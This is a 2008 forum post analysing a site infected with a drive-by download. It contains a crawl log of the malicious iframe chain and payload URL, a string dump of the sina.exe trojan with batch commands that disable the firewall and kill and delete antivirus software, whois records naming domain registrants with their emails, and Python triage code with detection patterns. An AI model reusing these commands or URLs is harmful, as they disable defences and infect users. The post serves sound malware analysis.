Posted on 2008-9-14 20:16:44
Found a site injected with a drive-by download (挂马)
Log is generated by FreShow.
[wide]http://www.lwlms.com/
[script]http://%61%76%65%32%2E%63%6E
[frame]http://asp-15.cn/ilink.html
[script]http://asp-15.cn/swfobject.js
[frame]http://asp-15.cn/flink.html
[frame]http://%61%76%65%32%2E%63%6E/http:\/\/www.wyf009.cn\/b2.htm
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://www.lwlms.com/Scripts/AC_RunActiveContent.js
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
Moving on to the analysis stage; results will be posted shortly.
Log is generated by FreShow.
[wide]http://www.lwlms.com/
[script]http://%61%76%65%32%2E%63%6E
[frame]http://asp-15.cn/ilink.html
[script]http://asp-15.cn/swfobject.js
[frame]http://asp-15.cn/flink.html
[frame]http://%61%76%65%32%2E%63%6E/http:\/\/www.wyf009.cn\/b2.htm
[frame]http://asp-15.cn/fxx.htm
[frame]http://www.hrz010.cn/a1/fx.htm
[frame]http://www.hrz010.cn/a1/ilink.html
[frame]http://www.hrz010.cn/a1/flink.html
[frame]http://www.hrz010.cn/a1/ms06014.htm
http://www.zmjjjyy.cn/new/a1.css
[frame]http://www.hrz010.cn/a1/GLWORLD.html
[frame]http://www.hrz009.cn/sina.htm
[object]http://down.hs7yue.cn/down/sina.exe DownloadAndInstall
[frame]http://www.hrz010.cn/a1/ss.html
[frame]http://www.hrz010.cn/a1/Thunder.html
[frame]http://www.hrz010.cn/a1/real.htm
[frame]http://www.hrz010.cn/a1/Real.html
[script]http://js.users.51.la/1936348.js
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://www.lwlms.com/Scripts/AC_RunActiveContent.js
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
Digging deeper. More later.
sina.exe is already a known virus.
// 由 PE Explorer 创建 1.98 (www.heaventools.com)
// 文件名称: I:\电影下载\bingd\d\d\sina.exe
// 已创建 : 14.09.2008 20:27
// 类型 : 字符串列表
00402E78: 'SOFTWARE\Borland\Delphi\RTL',0
00402E94: 'FPUMaskValue',0
00403548: 0Dh,0Ah
00404820: 'SYSTEM_32.LST'
00404838: 'Come_system.dll'
00404A2C: ':\Program Files\Common Files\Microsoft Shared\MSInfo\'
00404C60: 'open',0
00404D88: '{5B77087D-AB76-4C22-B0A6-C34D1F438E55}',0
00404DB0: 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks',0
00404E00: 'CLSID\{5B77087D-AB76-4C22-B0A6-C34D1F438E55}'
00404E38: '\InProcServer32'
00404E48: 'Apartment',0
00404E54: 'ThreadingModel',0
004050DC: 'MicroSoft.bat'
004050F4: ':try'
00405104: 'del "'
00405114: '"'
00405120: 'if exist "'
00405134: ' goto try'
00405148: 'del %0'
00405150: 'open',0
0040531C: 'mfc.bat'
0040532C: '@echo off'
00405340: 'set s=TASKKILL'
00405358: 'copy %0 %windir%\system32\cmd.bat'
00405384: 'attrib %windir%\system32\cmd.bat +r +s +h'
004053B8: 'net stop sharedaccess >nul'
004053DC: '%s% /im 360* /f >nul'
004053FC: '%s% /im RStray /f >nul'
0040541C: 'net stop Shadow" "System" "Service'
00405448: 'set alldrive=d e f g h i j k l m n o p q r s t u v w x y z'
0040548C: 'for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul'
00405514: 'for %%a in (c %alldrive%) do del %%a:\RStray* /f /s /q >nul'
00405550: 'open',0
00405640: 'Come_system'
00405C24: 'fsfsfsfds'
00405C38: 0Dh,0Ah
00405C44: 'fdsafsawewr'
00405C58: 'fdsaffsdfasawewr'
00405C74: 09h,0Ah
00405C80: '1'
00405E8C: '0'
00405E98: '-'
0040611C: '-'
00406188: 'mzxr'
00406268: 'MsgHookOn',0
00406274: 'MsgHookOff',0
00406280: 'BAIDUDll',0
0040628C: 'ListBox',0
004065A0: 'MZ'
0040664C: '\drivers\etc\hosts'
004066E4: 'tiantiandouxuyaoniaiwodexinsiyounicaiwodexiaoshihouchaonaorenxindeshihou'
(In Chinese this reads roughly: "I need you every day, my heart has you, when I was little, when noisy times troubled people's hearts.") Holy crap, how brazen!
00406BC0: 'ertyuioiuytr'
00406BD8: 'ertyuFSDioiuytr'
00406BF0: 'Microsoft Shared\MSInfo'
00406C10: '?x='
00406C1C: '&y='
00406C28: 'Come_System.bak'
00406C40: 'Come_System.sys'
00406C58: 'fsdauoiuweruoi'
00406C68: 'DLLFILE',0
00406C78: 'fesjlkiuweruoi'
00406C88: 'wininit.ini',0
00406C94: 'rename',0
00406C9C: 'BAIDUExe',0
00406CA8: 'ListBox',0
00406CB0: 'BAIDUDll',0
0040705C: 'Error',0
00407064: 'Runtime error at 00000000',0
Whois information
Whois Record for Hrz010.cn ( Hr z 010 )
Name Server:ns.xinnet.cn
Front Page Information
Website Title: Error
Title Relevancy 0%
AboutUs: Wiki article on Hrz010.cn
SEO Score: 60%
Terms: 16 (Unique: 12, Linked: 0)
Images: 0 (Alt tags missing: 0)
Links: 0 (Internal: 0, Outbound: 0)
Indexed Data
Registry Data
Created: 2008-09-11
Expires: 2009-09-11
Whois Server: whois.cnnic.net.cn
Server Data
Response Code: 403
Domain Status: Registered And No Website
DomainTools Exclusive
Registrant Search: "毛新泽" owns about 2 other domains
Email Search: is associated with about 4 domains
Whois Record
Domain Name: hrz010.cn
ROID: 20080911s10001s66983440-cn
Domain Status: ok
Registrant Organization: 毛新泽
Registrant Name: 毛新泽
Administrative Email: 564564@tom.com
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns.xinnetdns.com
Network
Response Code: 403
Domain Status: Registered And Active Website
DomainTools Exclusive
Email Search: is associated with about 4 domains
Dedicated Hosting: zmjjjyy.cn is hosted on a dedicated server.
Whois Record
Domain Name: zmjjjyy.cn
ROID: 20080819s10001s92309805-cn
Domain Status: ok
Registrant Organization: 展凌云
Registrant Name: 展凌云
Administrative Email: 6717520@qq.com (get this QQ account shut down; report it for spreading trojans)
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns.xinnetdns.com
Name Server:ns.xinnet.cn
Registration Date: 2008-08-19 14:56
Expiration Date: 2009-08-19 14:56
Ah, I was in a hurry and posted too fast. I've bundled the newly captured material in as well; updated.
[ This post was last edited by molicn on 2008-9-14 21:11 ]
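The two artifacts in this post, the FreShow crawl log and the PE Explorer string dump of sina.exe, are the kind of thing an analyst triages by hand. The following Python is an added example written for this page; it is not the poster's code and not part of FreShow or PE Explorer. It assumes the FreShow line format seen above (`[tag]URL`, optionally followed by a note such as `DownloadAndInstall`, with untagged bare URLs for stylesheets), decodes percent-encoded hostnames like `%61%76%65%32%2E%63%6E` so the real domain (`ave2.cn`) shows up in a report, counts which third-party hosts the audited site pulls content from, and flags persistence and defense-evasion indicators in the string list. The sample inputs are a constructed subset copied from the log and string dump above; the indicator category names are labels chosen for this example, not a standard taxonomy.

```python
"""Triage helpers for a FreShow crawl log and a PE string dump (added example)."""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample: a subset of the FreShow log lines from the post above.
SAMPLE_LOG = r"""Log is generated by FreShow.
[wide]http://www.lwlms.com/
[script]http://%61%76%65%32%2E%63%6E
[frame]http://asp-15.cn/ilink.html
[frame]http://%61%76%65%32%2E%63%6E/http:\/\/www.wyf009.cn\/b2.htm
[frame]http://www.hrz010.cn/a1/ms06014.htm
http://www.zmjjjyy.cn/new/a1.css
[object]http://down.hs7yue.cn/down/sina.exe DownloadAndInstall
"""

# "[tag]" is optional (bare URLs appear for CSS); a trailing note may follow the URL.
LINE_RE = re.compile(r"^(?:\[(?P<tag>\w+)\])?(?P<url>https?://\S+)(?:\s+(?P<note>.+))?$")


def parse_freshow(text):
    """Parse FreShow lines into dicts and decode percent-encoded hostnames.

    Returns a list of {'tag', 'url', 'host', 'obfuscated', 'note'}; banner
    lines that carry no URL are skipped.
    """
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        raw_host = urlsplit(m.group("url")).netloc
        host = unquote(raw_host).lower()  # "%61%76%65%32%2E%63%6E" -> "ave2.cn"
        entries.append({
            "tag": m.group("tag") or "resource",
            "url": m.group("url"),
            "host": host,
            "obfuscated": host != raw_host.lower(),  # encoded host = evasion hint
            "note": m.group("note"),
        })
    return entries


def external_hosts(entries, site_host):
    """Count loads per host other than the site being audited."""
    return Counter(e["host"] for e in entries if e["host"] != site_host)


# Constructed sample: a subset of the strings PE Explorer listed for sina.exe.
SAMPLE_STRINGS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks",
    r"CLSID\{5B77087D-AB76-4C22-B0A6-C34D1F438E55}",
    "set s=TASKKILL",
    "%s% /im 360* /f >nul",
    "net stop sharedaccess >nul",
    r"\drivers\etc\hosts",
    "wininit.ini",
    "Runtime error at 00000000",
]

# (category label, pattern); labels are this example's own naming.
STRING_RULES = [
    ("persistence:ShellExecuteHooks", re.compile(r"ShellExecuteHooks", re.I)),
    ("persistence:COM-CLSID", re.compile(r"CLSID\\\{[0-9A-F-]{36}\}", re.I)),
    ("defense-evasion:kill-process", re.compile(r"TASKKILL|/im \S+ /f", re.I)),
    ("defense-evasion:stop-firewall", re.compile(r"net stop sharedaccess", re.I)),
    ("tamper:hosts-file", re.compile(r"drivers\\etc\\hosts", re.I)),
    ("persistence:wininit.ini", re.compile(r"wininit\.ini", re.I)),
]


def triage_strings(strings):
    """Map each indicator category to the strings that triggered it."""
    hits = {}
    for s in strings:
        for category, rx in STRING_RULES:
            if rx.search(s):
                hits.setdefault(category, []).append(s)
    return hits


if __name__ == "__main__":
    entries = parse_freshow(SAMPLE_LOG)
    for e in entries:
        flag = " (percent-encoded host)" if e["obfuscated"] else ""
        print(f"{e['tag']:9} {e['host']}{flag}  {e['note'] or ''}")
    print("third-party hosts:", dict(external_hosts(entries, "www.lwlms.com")))
    for category, matched in triage_strings(SAMPLE_STRINGS).items():
        print(category, "->", matched)
```

Run against the full log, the third-party host tally is what tells you which domains to block at the proxy or sinkhole first, and the `obfuscated` flag separates the percent-encoded loader domain from ordinary third-party content such as the 51.la counter script.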